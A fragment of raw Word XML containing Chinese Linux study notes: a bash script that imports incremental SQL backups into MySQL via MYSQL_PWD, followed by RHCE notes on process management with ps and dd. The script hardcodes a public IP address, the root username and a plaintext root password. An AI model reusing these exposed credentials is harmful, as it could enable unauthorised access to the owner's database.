      </w:pPr>
    </w:p>
    <w:p w14:paraId="606114A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07614C45" w14:textId="29F90B8B" w:rsidR="004C452C" w:rsidRDefault="00203A46" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="187" w:name="_Toc159779647"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导入环境变量：例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用密码则使用环境变量</w:t>
      </w:r>
      <w:bookmarkEnd w:id="187"/>
    </w:p>
    <w:p w14:paraId="3AB79622" w14:textId="77AA31E9" w:rsidR="004C452C" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行一句</w:t>
      </w:r>
      <w:r w:rsidRPr="00014BEF">
        <w:t>export MYSQL_PWD=$password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33166C5D" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="598F9AA4" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752C65B5" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4346D2AE" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库连接配置选项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0D35DB" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>host='39.99.151.225'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D7C178" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>port='3306'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5825C0D4" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>username='root'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B63739C" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>password='Abcd@123456_root'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71570568" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRPr="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00014BEF">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>export MYSQL_PWD=$password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3277498A" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>db='sca'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254CF632" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="148DA572" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>今天日期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1910D29E" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>currentDate_Ymd=`date "+%Y_%m_%d"`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356CC6D3" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">## </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291454CF" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>#ftp_dir="/srv/ftp/data/sca/database/release/${currentDate_Ymd}_total"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C065FF8" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9C6D9B" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ftp_dir="/srv/ftp/data/sca/database/release/${currentDate_Ymd}_incremental"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B25BC35" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>dir=`/usr/bin/ls ${ftp_dir}/*.sql`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B2227C" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "[#] Start import backup to 39.99.151.225";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E1B1CF" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>for table in $dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726F25F7" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1077C8" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  echo "[+] Is backuping to 39.99.151.225: $table";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD001A7" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  mysql -u${username} -P${port} -h${host} ${db} &lt; $table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DC673E" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13718DDE" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="065C370C" w14:textId="77777777" w:rsidR="00014BEF" w:rsidRDefault="00014BEF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>echo "[#] Incremental Backup Compeleted to 39.99.151.225 "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D72169" w14:textId="7C29B659" w:rsidR="00203A46" w:rsidRPr="00014BEF" w:rsidRDefault="00203A46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67456240" w14:textId="612E07AA" w:rsidR="00203A46" w:rsidRDefault="00387C81" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="188" w:name="_Toc159779648"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RHCE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="188"/>
    </w:p>
    <w:p w14:paraId="3851B8E1" w14:textId="17511D37" w:rsidR="00387C81" w:rsidRDefault="00BC2290" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必修</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00E01C0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="00E01C0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程管理和</w:t>
      </w:r>
      <w:r w:rsidR="00E01C0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="00E01C0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE1A4FE" w14:textId="67AC8604" w:rsidR="006C5033" w:rsidRDefault="006368DA" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程管理介绍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255072CC" w14:textId="6BD4DD0D" w:rsidR="006C5033" w:rsidRDefault="00145B3B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程管理（地位非常高）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042C35FB" w14:textId="77777777" w:rsidR="0082470F" w:rsidRDefault="00852633" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1F82AD" w14:textId="77777777" w:rsidR="0082470F" w:rsidRDefault="0082470F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B134A3" w14:textId="66E4F76D" w:rsidR="00852633" w:rsidRDefault="00852633" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62CFD1D1" w14:textId="10AD1735" w:rsidR="00852633" w:rsidRDefault="00B94707" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程概念</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F06214" w14:textId="6690A991" w:rsidR="00B94707" w:rsidRDefault="00B94707" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程管理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A6A698" w14:textId="65546A75" w:rsidR="00B94707" w:rsidRDefault="00B94707" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程查看</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7ACC3E" w14:textId="4E9D0463" w:rsidR="00B94707" w:rsidRDefault="00B94707" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>终止进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3625BDD2" w14:textId="77777777" w:rsidR="00B94707" w:rsidRDefault="00B94707" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E40582A" w14:textId="77777777" w:rsidR="00B94707" w:rsidRDefault="00B94707" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02CF1085" w14:textId="77777777" w:rsidR="00B94707" w:rsidRDefault="00B94707" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB79218" w14:textId="77777777" w:rsidR="00852633" w:rsidRDefault="00852633" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EAFE4A4" w14:textId="47270B08" w:rsidR="006368DA" w:rsidRPr="00145B3B" w:rsidRDefault="006B6D85" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程就是运行中的程序（进行中的程序</w:t>
      </w:r>
      <w:r w:rsidR="001D2697">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="001D2697">
        <w:t>process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79004D32" w14:textId="253DB504" w:rsidR="006368DA" w:rsidRDefault="003D282A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程会占用四类资源：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE56F2F" w14:textId="110C5669" w:rsidR="003D282A" w:rsidRDefault="003D282A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>network</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>disk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E0311C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53549320" w14:textId="77777777" w:rsidR="00E0311C" w:rsidRDefault="00E0311C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A27B39F" w14:textId="375BFC3E" w:rsidR="003A0386" w:rsidRDefault="00BB70E8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令查看进程当前时刻</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A837724" w14:textId="56509109" w:rsidR="003A0386" w:rsidRDefault="007C3246" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ED8105" w14:textId="09AECB89" w:rsidR="00E43B32" w:rsidRDefault="00E43B32" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tgb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E16D5EE" w14:textId="5F1EFF77" w:rsidR="007C3246" w:rsidRDefault="00E43B32" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>s aux | grep tgb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF2D99E" w14:textId="77777777" w:rsidR="003A0386" w:rsidRDefault="003A0386" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CFDAB96" w14:textId="78D3B7F7" w:rsidR="003A0386" w:rsidRDefault="004C1DC2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D457D82" wp14:editId="53B8B8C2">
            <wp:extent cx="5274310" cy="2582545"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="664417703"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17703" name="图片 1" descr="图形用户界面, 文本&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="2582545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="305FFF37" w14:textId="2AC2CCD8" w:rsidR="000A0727" w:rsidRDefault="000A0727" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发人员常关注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的大小，因为这是实际使用内存的大小，而不关注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VSZ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的大小。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7FF4D9" w14:textId="77777777" w:rsidR="000A0727" w:rsidRDefault="000A0727" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4633E4E9" w14:textId="6DCEBEF0" w:rsidR="00AE2CAC" w:rsidRDefault="00AE2CAC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制文件，并对源文件的内容进行转换和格式化处理。</w:t>
      </w:r>
      <w:r w:rsidR="00C9155E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以计算磁盘的读写速度，确定磁盘的最佳块大小。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E11A3C" w14:textId="2A3CB9F7" w:rsidR="004274F9" w:rsidRDefault="004274F9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76B70CA6" wp14:editId="5137378C">
            <wp:extent cx="3855244" cy="3405017"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1469643231"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43231" name="图片 1" descr="图形用户界面, 文本, 应用程序&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3856735" cy="3406334"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C110F2" w14:textId="1CF38B4E" w:rsidR="00F8684C" w:rsidRDefault="00F8684C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入数据刀到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADEAFFF" w14:textId="2265096F" w:rsidR="003A0386" w:rsidRDefault="001A4BE1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> if=/dev/zero of=/dev/null </w:t>
      </w:r>
      <w:r w:rsidR="00890D29">
        <w:t>bs</w:t>
      </w:r>
      <w:r>
        <w:t>=100</w:t>
      </w:r>
      <w:r w:rsidR="00890D29">
        <w:t>MB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22501AC8" w14:textId="2608C28A" w:rsidR="00890D29" w:rsidRDefault="00D41E8A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一瞬间可以看到占用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的该进程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEE9555" w14:textId="77777777" w:rsidR="003A0386" w:rsidRDefault="003A0386" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
